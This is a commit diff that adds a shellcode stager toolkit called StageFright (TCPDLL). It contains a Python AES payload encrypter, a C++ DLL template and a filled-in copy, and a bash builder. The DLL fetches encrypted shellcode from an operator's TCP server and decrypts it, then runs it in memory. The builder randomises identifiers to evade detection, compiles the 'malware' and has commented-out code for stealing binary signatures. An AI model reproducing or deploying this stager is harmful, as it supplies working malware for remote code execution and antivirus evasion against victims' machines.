Add files via upload

StageFright/StageFright/StageFright/TCPDLL/Resources/aesencrypt.py

@@ -0,0 +1,26 @@
+# Red Team Operator course code template
+# payload encryption with AES
+# 
+# author: reenz0h (twitter: @SEKTOR7net)
+
+import sys
+from base64 import b64encode
+from Crypto.Cipher import AES
+from Crypto.Util.Padding import pad
+from Crypto.Random import get_random_bytes
+import hashlib
+
+KEY = get_random_bytes(16)
+iv = 16 * b'\x00'
+cipher = AES.new(hashlib.sha256(KEY).digest(), AES.MODE_CBC, iv)
+
+try:
+    plaintext = open(sys.argv[1], "rb").read()
+except:
+    print("File argument needed! %s <raw payload file>" % sys.argv[0])
+    sys.exit()
+
+ciphertext = cipher.encrypt(pad(plaintext, AES.block_size))
+
+print('AESkey[] = { 0x' + ', 0x'.join(hex(x)[2:] for x in KEY) + ' };')
+print('payload[] = { 0x' + ', 0x'.join(hex(x)[2:] for x in ciphertext) + ' };')

StageFright/StageFright/StageFright/TCPDLL/Resources/template.cpp

@@ -0,0 +1,188 @@
+#include <winsock2.h>
+#include <ws2tcpip.h>
+#include <windows.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <wincrypt.h>
+#pragma comment(lib, "crypt32.lib")
+#pragma comment(lib, "advapi32")
+#include <psapi.h>
+
+// Define the shellcode function signature
+typedef void (*HUUTjodrPVG)();
+
+bool WXEjtHeXGRaH(const char* OQmbgsGuW, int yprPDCUUPq, const char* Random4, char*& GugJH, size_t& ENUQBQQ) {
+    WSADATA wsaData;
+    if (WSAStartup(MAKEWORD(2, 2), &wsaData) != 0) {
+        printf("Failed to initialize Winsock.\n");
+        return false;
+    }
+
+    SOCKET clientSocket = socket(AF_INET, SOCK_STREAM, 0);
+    if (clientSocket == INVALID_SOCKET) {
+        perror("Error creating socket");
+        WSACleanup();
+        return false;
+    }
+
+    sockaddr_in serverAddress{};
+    serverAddress.sin_family = AF_INET;
+    serverAddress.sin_port = htons(yprPDCUUPq);
+    serverAddress.sin_addr.s_addr = inet_addr(OQmbgsGuW);
+
+    if (serverAddress.sin_addr.s_addr == INADDR_NONE) {
+        perror("Invalid address/Address not supported");
+        closesocket(clientSocket);
+        WSACleanup();
+        return false;
+    }
+
+    if (connect(clientSocket, (struct sockaddr*)&serverAddress, sizeof(serverAddress)) < 0) {
+        perror("Connection failed");
+        closesocket(clientSocket);
+        WSACleanup();
+        return false;
+    }
+
+    // Send the length of the file path first
+    size_t Random4Len = strlen(Random4);
+    printf("Sending file path length: %zu\n", Random4Len);
+    send(clientSocket, reinterpret_cast<char*>(&Random4Len), sizeof(Random4Len), 0);
+
+    // Send the file path to the server
+    printf("Sending file path: %s\n", Random4);
+    send(clientSocket, Random4, Random4Len, 0);
+
+    int fileSize;
+    int bytesRead = recv(clientSocket, reinterpret_cast<char*>(&fileSize), sizeof(fileSize), 0);
+    if (bytesRead != sizeof(fileSize)) {
+        printf("Error receiving file size: %d\n", WSAGetLastError());
+        closesocket(clientSocket);
+        WSACleanup();
+        return false;
+    }
+
+    fileSize = ntohl(fileSize); // Convert from network byte order to host byte order
+
+    printf("Received file size: %d\n", fileSize);
+    // Receive and save the binary data in a dynamically allocated buffer
+    GugJH = new char[fileSize];
+    if (GugJH == nullptr) {
+        printf("Error allocating memory for binary data.\n");
+        closesocket(clientSocket);
+        WSACleanup();
+        return false;
+    }
+
+    size_t totalSize = 0;
+    while (totalSize < fileSize) {
+        bytesRead = recv(clientSocket, GugJH + totalSize, fileSize - totalSize, 0);
+        if (bytesRead <= 0) {
+            printf("Error receiving binary data: %d\n", WSAGetLastError());
+            delete[] GugJH;
+            closesocket(clientSocket);
+            WSACleanup();
+            return false;
+        }
+        totalSize += bytesRead;
+    }
+
+    // Close the socket
+    closesocket(clientSocket);
+
+    ENUQBQQ = totalSize;
+    printf("Received data size: %zu\n", ENUQBQQ);
+
+    return true;
+}
+
+int kaRyEcluPiEW(char* gwtamZsHddxtV, unsigned int gwtamZsHddxtV_len, char* iNjzxZyJyK, size_t iNjzxZyJyKlen) {
+    HCRYPTPROV hProv;
+    HCRYPTHASH hHash;
+    HCRYPTKEY hKey;
+
+    if (!CryptAcquireContextW(&hProv, NULL, NULL, PROV_RSA_AES, CRYPT_VERIFYCONTEXT)) {
+        return -1;
+    }
+    if (!CryptCreateHash(hProv, CALG_SHA_256, 0, 0, &hHash)) {
+        return -1;
+    }
+    if (!CryptHashData(hHash, (BYTE*)iNjzxZyJyK, (DWORD)iNjzxZyJyKlen, 0)) {
+        return -1;
+    }
+    if (!CryptDeriveKey(hProv, CALG_AES_256, hHash, 0, &hKey)) {
+        return -1;
+    }
+
+    if (!CryptDecrypt(hKey, (HCRYPTHASH)NULL, 0, 0, gwtamZsHddxtV, &gwtamZsHddxtV_len)) {
+        return -1;
+    }
+
+    CryptReleaseContext(hProv, 0);
+    CryptDestroyHash(hHash);
+    CryptDestroyKey(hKey);
+
+    return 0;
+}
+
+char iNjzxZyJyK[] =  { 0x59, 0xfa, 0xe2, 0x44, 0x6c, 0xf1, 0x9e, 0xf6, 0xdf, 0xd8, 0x4e, 0x16, 0xcd, 0xf5, 0x8a, 0xf6 };;
+
+extern "C" void CALLBACK Go(HWND hwnd, HINSTANCE hinst, LPSTR lpszCmdLine, int nCmdShow) {
+    const char* OQmbgsGuW = "192.168.1.12";        // Replace with the actual server IP
+    int yprPDCUUPq = 8080;                     // Replace with the actual server port
+    const char* Random4 = "invoice.txt";   // Replace with the actual file path on the server
+
+    char* GugJH;
+    size_t ENUQBQQ;
+
+    if (WXEjtHeXGRaH(OQmbgsGuW, yprPDCUUPq, Random4, GugJH, ENUQBQQ)) {
+        printf("Binary data received successfully.\n");
+
+        // Print received data size for debugging
+        printf("Received data size: %zu\n", ENUQBQQ);
+
+        kaRyEcluPiEW((char*)GugJH, ENUQBQQ, iNjzxZyJyK, sizeof(iNjzxZyJyK));
+
+        // Allocate executable memory with READ, WRITE permissions
+        LPVOID executableMemory = VirtualAlloc(NULL, ENUQBQQ, MEM_COMMIT, PAGE_READWRITE);
+        if (executableMemory == NULL) {
+            DWORD error = GetLastError();
+            printf("Error allocating executable memory: %d\n", error);
+            delete[] GugJH;
+            return;
+        }
+
+        // Copy binary data to the executable memory
+        memcpy(executableMemory, GugJH, ENUQBQQ);
+
+        // Change the protection to PAGE_EXECUTE_READ
+        DWORD oldProtect;
+        if (!VirtualProtect(executableMemory, ENUQBQQ, PAGE_EXECUTE_READ, &oldProtect)) {
+            DWORD error = GetLastError();
+            printf("Error changing memory protection: %d\n", error);
+            VirtualFree(executableMemory, 0, MEM_RELEASE);
+            delete[] GugJH;
+            return;
+        }
+
+        // Create a function pointer to the shellcode
+        HUUTjodrPVG pCyhiFoGQ = reinterpret_cast<HUUTjodrPVG>(executableMemory);
+
+        // Call the shellcode function
+        printf("Executing shellcode...\n");
+        pCyhiFoGQ();
+
+        // No freeing of allocated memory in this POC
+
+        printf("Shellcode executed successfully.\n");
+
+        // Free allocated memory
+        delete[] GugJH;
+    } else {
+        printf("Failed to receive binary data.\n");
+        return;
+    }
+}
+
+

StageFright/StageFright/StageFright/TCPDLL/TCPDLL.sh

@@ -0,0 +1,172 @@
+#!/bin/bash
+
+# Color variables
+red='\033[0;31m'
+green='\033[0;32m'
+yellow='\033[0;33m'
+blue='\033[0;34m'
+magenta='\033[0;35m'
+cyan='\033[0;36m'
+# Clear the color after that
+clear='\033[0m'
+cat << "EOF"
+TCP DLL STAGER                        
+
+EOF
+
+echo -e ${green}"Enter The Path To Your Shellcode File. ex: /home/user/Downloads/shellcode.bin"${clear}
+echo ""
+read Shellcode
+echo ""
+echo -e ${green}"What's The IP For Your TCP Server?"${clear}
+echo ""
+read HOSTIP
+echo ""
+echo -e ${green}"What Is The Port Your TCP Server Is Using?"${clear}
+echo ""
+read PORTY
+echo ""
+echo -e ${green}"Name Your Shellcode File. ex: invoice.txt"${clear}
+echo ""
+read SHELLCODEFILE
+echo ""
+echo -e ${green}"Name Your Malware! ex: malware.dll"${clear}
+echo ""
+read MALWARE
+echo ""
+cp StageFright/TCPDLL/template.cpp StageFright/TCPDLL/Resources/template.cpp
+echo -e ${yellow}"+++Encrypting Payload+++" ${clear}
+echo ""
+sleep 2
+python3 StageFright/TCPDLL/Resources/aesencrypt.py $Shellcode > shell.txt
+echo -e ${yellow}"***Encryption Completed***"${clear}
+echo ""
+cp shell.txt shell2.txt
+
+#Generate AES Key
+keys=$(cat "shell2.txt")
+cut -d 'p' -f1 shell2.txt > shell3.txt
+keys=$(cat shell3.txt)
+keysnow=${keys#*=}
+sed -i "s/KEYVALUE/$keysnow/g" StageFright/TCPDLL/Resources/template.cpp
+
+#Generate AES Payload
+payload=$(cat "shell.txt")
+payloadnow=${payload#*;}
+payloadtoday=${payloadnow#*=}
+echo $payloadtoday > shell5.txt
+cp StageFright/TCPDLL/conv.py StageFright/TCPDLL/Resources/con.py
+perl -pe 's/PAYVAL/`cat shell5.txt`/ge' -i StageFright/TCPDLL/Resources/con.py
+sed -i "s/{/[/g" -i StageFright/TCPDLL/Resources/con.py
+sed -i "s/}/]/g" -i StageFright/TCPDLL/Resources/con.py
+sed -i "s/;//g" -i StageFright/TCPDLL/Resources/con.py
+python3 StageFright/TCPDLL/Resources/con.py
+#rm StageFright/TCPDLL/Resources/con.py
+mv payload.bin $SHELLCODEFILE
+sleep 2
+
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-11} | head -n 1 > shell.txt
+RandomE=$(cat shell.txt)
+sed -i "s/RandomE/$RandomE/g" StageFright/TCPDLL/Resources/template.cpp
+
+
+#Replace IP, PORT and SHELLCODEFILE
+sed -i "s/HOSTIP/$HOSTIP/g" StageFright/TCPDLL/Resources/template.cpp
+sed -i "s/PORTY/$PORTY/g" StageFright/TCPDLL/Resources/template.cpp
+sed -i "s/SHELLCODEFILE/$SHELLCODEFILE/g" StageFright/TCPDLL/Resources/template.cpp
+#Replacing Values
+
+# Get Payload From URL Function
+
+#FindShare
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-12} | head -n 1 > shell.txt
+Random1=$(cat shell.txt)
+sed -i "s/Random1/$Random1/g" StageFright/TCPDLL/Resources/template.cpp
+
+#pPayloadBytes
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-9} | head -n 1 > shell.txt
+Random2=$(cat shell.txt)
+sed -i "s/Random2/$Random2/g" StageFright/TCPDLL/Resources/template.cpp
+
+#sPayloadSize
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-10} | head -n 1 > shell.txt
+Random3=$(cat shell.txt)
+sed -i "s/Random3/$Random3/g" StageFright/TCPDLL/Resources/template.cpp
+
+#sPayloadSize
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-10} | head -n 1 > shell.txt
+Random4=$(cat shell.txt)
+
+sed -i "s/Random3/$Random3/g" StageFright/TCPDLL/Resources/template.cpp
+#bSTATE
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-5} | head -n 1 > shell.txt
+Random5=$(cat shell.txt)
+sed -i "s/Random5/$Random5/g" StageFright/TCPDLL/Resources/template.cpp
+
+#sSize
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-7} | head -n 1 > shell.txt
+Random6=$(cat shell.txt)
+sed -i "s/Random6/$Random6/g" StageFright/TCPDLL/Resources/template.cpp
+
+#hInternet
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-12} | head -n 1 > shell.txt
+Random7=$(cat shell.txt)
+sed -i "s/Random7/$Random7/g" StageFright/TCPDLL/Resources/template.cpp
+
+#dwBytesRead
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-13} | head -n 1 > shell.txt
+Random8=$(cat shell.txt)
+sed -i "s/Random8/$Random8/g" StageFright/TCPDLL/Resources/template.cpp
+
+#pBytes
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-10} | head -n 1 > shell.txt
+Random9=$(cat shell.txt)
+sed -i "s/Random9/$Random9/g" StageFright/TCPDLL/Resources/template.cpp
+
+#PAYLOAD
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-11} | head -n 1 > shell.txt
+RandomA=$(cat shell.txt)
+sed -i "s/RandomA/$RandomA/g" StageFright/TCPDLL/Resources/template.cpp
+
+#Sleep Function
+
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-9} | head -n 1 > shell.txt
+RandomJ=$(cat shell.txt)
+sed -i "s/RandomJ/$RandomJ/g" StageFright/TCPDLL/Resources/template.cpp
+
+#AES KEY NAME
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-12} | head -n 1 > shell.txt
+RandomK=$(cat shell.txt)
+sed -i "s/RandomK/$RandomK/g" StageFright/TCPDLL/Resources/template.cpp
+
+# Main Function
+
+#Bytes
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-9} | head -n 1 > shell.txt
+RandomB=$(cat shell.txt)
+sed -i "s/RandomB/$RandomB/g" StageFright/TCPDLL/Resources/template.cpp
+
+#Size
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-11} | head -n 1 > shell.txt
+RandomC=$(cat shell.txt)
+sed -i "s/RandomC/$RandomC/g" StageFright/TCPDLL/Resources/template.cpp
+
+#Compile
+
+echo -e ${yellow}"+++Compiling Malware+++"${clear}
+x86_64-w64-mingw32-g++ -shared -o $MALWARE StageFright/TCPDLL/Resources/template.cpp -lws2_32 -lntdll -static-libgcc -static-libstdc++ -Wl,--subsystem,windows -O2 -Wno-narrowing -fpermissive >/dev/null 2>&1
+echo ""
+sleep 2
+rm shell*
+echo -e ${yellow}"***Malware Compiled***"${clear}
+echo ""
+sleep 2
+#echo -e ${yellow}"+++Adding Binary Signature+++"${clear}
+#echo ""
+#sleep 2
+#python3 StageFright/StageFright/ResourcesSigThief/sigthief.py -i StageFright/StageFright/TCPDLL/Resources/OfficeSetup.exe #-t $MALWARE -o signed$MALWARE >/dev/null 2>&1
+#mv signed$MALWARE $MALWARE
+#echo -e ${yellow}"***Signature Added. Happy Hunting!**"${clear}
+#echo ""
+
+

StageFright/StageFright/StageFright/TCPDLL/conv.py

@@ -0,0 +1,4 @@
+buf=PAYVAL 
+payload = bytes(bytearray(buf))
+with open('payload.bin', 'wb') as f:
+    f.write(payload)

StageFright/StageFright/StageFright/TCPDLL/template.cpp

@@ -0,0 +1,188 @@
+#include <winsock2.h>
+#include <ws2tcpip.h>
+#include <windows.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <wincrypt.h>
+#pragma comment(lib, "crypt32.lib")
+#pragma comment(lib, "advapi32")
+#include <psapi.h>
+
+// Define the shellcode function signature
+typedef void (*RandomA)();
+
+bool Random1(const char* Random2, int Random3, const char* Random4, char*& Random5, size_t& Random6) {
+    WSADATA wsaData;
+    if (WSAStartup(MAKEWORD(2, 2), &wsaData) != 0) {
+        printf("Failed to initialize Winsock.\n");
+        return false;
+    }
+
+    SOCKET clientSocket = socket(AF_INET, SOCK_STREAM, 0);
+    if (clientSocket == INVALID_SOCKET) {
+        perror("Error creating socket");
+        WSACleanup();
+        return false;
+    }
+
+    sockaddr_in serverAddress{};
+    serverAddress.sin_family = AF_INET;
+    serverAddress.sin_port = htons(Random3);
+    serverAddress.sin_addr.s_addr = inet_addr(Random2);
+
+    if (serverAddress.sin_addr.s_addr == INADDR_NONE) {
+        perror("Invalid address/Address not supported");
+        closesocket(clientSocket);
+        WSACleanup();
+        return false;
+    }
+
+    if (connect(clientSocket, (struct sockaddr*)&serverAddress, sizeof(serverAddress)) < 0) {
+        perror("Connection failed");
+        closesocket(clientSocket);
+        WSACleanup();
+        return false;
+    }
+
+    // Send the length of the file path first
+    size_t Random4Len = strlen(Random4);
+    printf("Sending file path length: %zu\n", Random4Len);
+    send(clientSocket, reinterpret_cast<char*>(&Random4Len), sizeof(Random4Len), 0);
+
+    // Send the file path to the server
+    printf("Sending file path: %s\n", Random4);
+    send(clientSocket, Random4, Random4Len, 0);
+
+    int fileSize;
+    int bytesRead = recv(clientSocket, reinterpret_cast<char*>(&fileSize), sizeof(fileSize), 0);
+    if (bytesRead != sizeof(fileSize)) {
+        printf("Error receiving file size: %d\n", WSAGetLastError());
+        closesocket(clientSocket);
+        WSACleanup();
+        return false;
+    }
+
+    fileSize = ntohl(fileSize); // Convert from network byte order to host byte order
+
+    printf("Received file size: %d\n", fileSize);
+    // Receive and save the binary data in a dynamically allocated buffer
+    Random5 = new char[fileSize];
+    if (Random5 == nullptr) {
+        printf("Error allocating memory for binary data.\n");
+        closesocket(clientSocket);
+        WSACleanup();
+        return false;
+    }
+
+    size_t totalSize = 0;
+    while (totalSize < fileSize) {
+        bytesRead = recv(clientSocket, Random5 + totalSize, fileSize - totalSize, 0);
+        if (bytesRead <= 0) {
+            printf("Error receiving binary data: %d\n", WSAGetLastError());
+            delete[] Random5;
+            closesocket(clientSocket);
+            WSACleanup();
+            return false;
+        }
+        totalSize += bytesRead;
+    }
+
+    // Close the socket
+    closesocket(clientSocket);
+
+    Random6 = totalSize;
+    printf("Received data size: %zu\n", Random6);
+
+    return true;
+}
+
+int Random7(char* Random8, unsigned int Random8_len, char* Random9, size_t Random9len) {
+    HCRYPTPROV hProv;
+    HCRYPTHASH hHash;
+    HCRYPTKEY hKey;
+
+    if (!CryptAcquireContextW(&hProv, NULL, NULL, PROV_RSA_AES, CRYPT_VERIFYCONTEXT)) {
+        return -1;
+    }
+    if (!CryptCreateHash(hProv, CALG_SHA_256, 0, 0, &hHash)) {
+        return -1;
+    }
+    if (!CryptHashData(hHash, (BYTE*)Random9, (DWORD)Random9len, 0)) {
+        return -1;
+    }
+    if (!CryptDeriveKey(hProv, CALG_AES_256, hHash, 0, &hKey)) {
+        return -1;
+    }
+
+    if (!CryptDecrypt(hKey, (HCRYPTHASH)NULL, 0, 0, Random8, &Random8_len)) {
+        return -1;
+    }
+
+    CryptReleaseContext(hProv, 0);
+    CryptDestroyHash(hHash);
+    CryptDestroyKey(hKey);
+
+    return 0;
+}
+
+char Random9[] = KEYVALUE;
+
+extern "C" void CALLBACK Go(HWND hwnd, HINSTANCE hinst, LPSTR lpszCmdLine, int nCmdShow) {
+    const char* Random2 = "HOSTIP";        // Replace with the actual server IP
+    int Random3 = PORTY;                     // Replace with the actual server port
+    const char* Random4 = "SHELLCODEFILE";   // Replace with the actual file path on the server
+
+    char* Random5;
+    size_t Random6;
+
+    if (Random1(Random2, Random3, Random4, Random5, Random6)) {
+        printf("Binary data received successfully.\n");
+
+        // Print received data size for debugging
+        printf("Received data size: %zu\n", Random6);
+
+        Random7((char*)Random5, Random6, Random9, sizeof(Random9));
+
+        // Allocate executable memory with READ, WRITE permissions
+        LPVOID executableMemory = VirtualAlloc(NULL, Random6, MEM_COMMIT, PAGE_READWRITE);
+        if (executableMemory == NULL) {
+            DWORD error = GetLastError();
+            printf("Error allocating executable memory: %d\n", error);
+            delete[] Random5;
+            return;
+        }
+
+        // Copy binary data to the executable memory
+        memcpy(executableMemory, Random5, Random6);
+
+        // Change the protection to PAGE_EXECUTE_READ
+        DWORD oldProtect;
+        if (!VirtualProtect(executableMemory, Random6, PAGE_EXECUTE_READ, &oldProtect)) {
+            DWORD error = GetLastError();
+            printf("Error changing memory protection: %d\n", error);
+            VirtualFree(executableMemory, 0, MEM_RELEASE);
+            delete[] Random5;
+            return;
+        }
+
+        // Create a function pointer to the shellcode
+        RandomA RandomB = reinterpret_cast<RandomA>(executableMemory);
+
+        // Call the shellcode function
+        printf("Executing shellcode...\n");
+        RandomB();
+
+        // No freeing of allocated memory in this POC
+
+        printf("Shellcode executed successfully.\n");
+
+        // Free allocated memory
+        delete[] Random5;
+    } else {
+        printf("Failed to receive binary data.\n");
+        return;
+    }
+}
+
+